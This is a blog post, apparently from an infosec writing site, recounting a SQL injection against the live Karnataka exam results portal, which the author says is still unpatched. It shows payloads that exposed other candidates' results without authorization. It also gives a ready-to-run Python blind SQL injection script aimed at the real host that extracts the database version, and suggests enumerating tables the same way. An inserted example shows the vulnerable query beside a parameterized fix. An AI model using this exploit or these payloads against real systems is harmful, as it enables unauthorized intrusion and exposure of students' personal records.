How I hacked Karnataka NIC portal with a simple SQL injection
Adithya M S found a SQL injection vulnerability in the Karnataka NIC portal karresults.nic.in; by entering malicious input he retrieved other people's exam results and wrote a script to extract the database version. Although he tried to report the problem, it was not resolved. 2025-6-12 06:4:21 Author: infosecwriteups.com

Adithya M S

Hello guys, I am Adithya M S, a guy passionate about exploring hidden endpoints in web services and websites, trying to dig deeper into them.

Today, I shall share my findings on how I hacked the Karnataka NIC portal with a surprisingly simple SQL injection.

Disclaimer: The content provided in this article is for educational and informational purposes only. Always ensure you have proper authorization before conducting security assessments. Use this information responsibly.

The website is none other than karresults.nic.in. My brother gave his KCET exam a few months back, and I went to this portal to check his results when they arrived on 24th May. The page to check results looks like this:

KCET results login page

The URL of the results login page is https://karresults.nic.in/slindfirst_25.asp

At first I entered his application number and the first four letters of his name in the respective fields, and I was able to retrieve his result.

After this, my hacky mind started thinking of an SQL injection plan. I just entered a "random" value of 123456789 in the application number field and A' OR 1=1; -- in the name field. There was a maxlength=4 restriction on the name field, but I just inspected the element to change it. Then, surprise, surprise, I got to see somebody else's result records.

Inspecting the name field to change its maxlength from 4 to 90
SQL injection payload A' OR 1=1; -- in name field
Result after submitting above payload for SQL injection

Now I tried the same thing with A' OR 1=2; --

I got the response

Response for A' OR 1=2; -- SQL injection

Yes!! Indeed, the website puts user input directly into the SQL query it uses to fetch the results.

We get a different response based on the truth value of the OR condition. Wow! This lends itself to a classic boolean-based SQL injection.
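The pattern behind this response difference, as an added example that is not from the original post: a Python/SQLite stand-in (the real portal is classic ASP on Microsoft SQL Server and its schema is unknown, so the table, column names and rows here are constructed) showing the query built by string splicing, which the two payloads above turn into a yes/no oracle, beside a lookup that validates the fields server-side and binds parameters.

```python
import sqlite3

# Constructed sample data standing in for the results table; the portal's real
# schema and column names are unknown and assumed here.
ROWS = [
    ("111122223", "ADIT", "RANK 1042"),
    ("444455556", "PRIY", "RANK 87"),
]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE results (reg TEXT, name4 TEXT, result TEXT)")
    db.executemany("INSERT INTO results VALUES (?, ?, ?)", ROWS)
    return db

def lookup_vulnerable(db, reg, name):
    # The pattern the post describes: user input spliced into the SQL text.
    # With name = "A' OR 1=1; --" the WHERE clause becomes
    #   reg='...' AND name4='A' OR 1=1; --'
    # and AND binds tighter than OR, so every row matches; with 1=2 nothing does.
    sql = f"SELECT reg, result FROM results WHERE reg='{reg}' AND name4='{name}'"
    return db.execute(sql).fetchall()

def lookup_fixed(db, reg, name):
    # Server-side validation replaces the client-side maxlength=4 that the post
    # bypassed in the inspector, and bound parameters keep the input out of the
    # query text, so the same payload is just a name string that matches nothing.
    if not (reg.isdigit() and len(reg) == 9 and name.isalpha() and len(name) == 4):
        return []
    sql = "SELECT reg, result FROM results WHERE reg=? AND name4=?"
    return db.execute(sql, (reg, name)).fetchall()

def demo():
    db = make_db()
    truthy = lookup_vulnerable(db, "123456789", "A' OR 1=1; --")  # other people's rows
    falsy = lookup_vulnerable(db, "123456789", "A' OR 1=2; --")   # empty page: the oracle
    fixed = lookup_fixed(db, "123456789", "A' OR 1=1; --")        # rejected before the query
    legit = lookup_fixed(db, "111122223", "ADIT")                # the normal lookup still works
    return len(truthy), len(falsy), len(fixed), legit
```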

import requests

# Microsoft SQL Server 2012 (SP2-GDR) (KB3194719) - 11.0.5388.0 (X64)
# Sep 23 2016 16:56:29
# A' OR SUBSTRING(CONVERT(VARCHAR(MAX), CONVERT(VARBINARY(MAX), @@VERSION), 1), 3, 1) LIKE '4%';--

domain = "karresults.nic.in"
resource = "slrespage_2025.asp"
url = f"https://{domain}/{resource}"

def get_yn(query):
    # Inject the boolean condition through the name field; the size of the
    # response tells us whether it was true (a result page) or false (an error page).
    data = {'frm_tokens': '0.8958377', 'reg': '123456789', 'name': f"A' OR {query};--"}
    res = requests.post(url, data=data)
    content_length = int(res.headers['Content-Length'])
    if content_length == 10796:
        return True
    elif content_length == 2511:
        return False
    else:
        raise Exception("Something is wrong with your exploit... Please change it")

def get_ms_sql_version():
    # Hex digits with bit 3, 2, 1 and 0 set, respectively: one request per bit.
    nibble_bits = ["('8', '9', 'a', 'b', 'c', 'd', 'e', 'f')", "('4', '5', '6', '7', 'c', 'd', 'e', 'f')",
                   "('2', '6', 'a', 'e', '3', '7', 'b', 'f')", "('1', '3', '5', '7', '9', 'b', 'd', 'f')"]
    count = 0
    found_ver_str = ""
    # LEN() is the T-SQL length function (LENGTH() does not exist in SQL Server).
    while get_yn(f"LEN(@@VERSION) > {count}"):
        cval = 0
        # The hex dump starts with "0x", so character number `count` occupies
        # positions 3+2*count and 3+2*count+1 of the dump.
        for i in range(2):
            for h in range(4):
                cval *= 2
                cval += int(get_yn(f"SUBSTRING(CONVERT(VARCHAR(MAX), CONVERT(VARBINARY(MAX), @@VERSION), 1), {3+2*count+i}, 1) IN {nibble_bits[h]}"))
        found_ver_str += chr(cval)
        print("Ver found till now: ", found_ver_str)
        count += 1
    print("Hurray, we got it!!")
    return found_ver_str

get_ms_sql_version()

Let us put this vulnerability to action by retrieving the version of the SQL database system.

I guessed that it uses Microsoft SQL Server, as the VERSION() function made the server hang, possibly due to a server error.

Version string is represented as @@VERSION in Microsoft SQL Server.

By looking at the action attribute of the page's form element, notice that the web form sends a POST request to /slrespage_2025.asp with our input data as parameters.

Therefore, our Python program also sends a POST request to this endpoint and reads the result from the response.

The above Python program works on the hex-encoded string of @@VERSION: for each hex character it sends four requests, each checking whether that character is in one of 4 different lists, which yields one bit of the character's binary encoding per request, so each hex character is deduced with four requests.

Then we add the decoded character to the found_ver_str variable, check whether @@VERSION is longer than the number of characters found so far, and repeat this process iteratively.

Let’s see this program in action:

Output of the Blind SQL injection exploit code

Now after this, we can all understand that this could be used to get any string from the database, and possibly enumerate all values in a particular field too (If these YES or NO answers are used in a clever way). For example, one could enumerate all table names in the database and enumerate all column names in a particular table after which values of this column may well reveal sensitive information.

So, I tried reporting this vulnerability in a couple of ways.

I mailed [email protected]. I got NO response.

Mail sent to [email protected]

After this I also raised a ticket with the same content in NIC ServiceDesk. They simply replied that it is out of their scope.

Service Desk response

Unfortunately, this bug is still not resolved. Please do respond to this blog and let me know who can resolve this security issue and how.

I hope you guys had a nice time reading about my practical experience with web bugs. I shall bring more such articles if you like this one.

Please do respond with your valuable feedback and give me some claps 👏 if you liked this one, as these small gestures push me towards building better content. Also follow me to get regular notifications of content published by me.

Happy hacking and see you all next time!!


Article source: https://infosecwriteups.com/how-i-hacked-karnataka-nic-portal-with-a-simple-sql-injection-073f064ad99e?source=rss----7b722bfd1b8d---4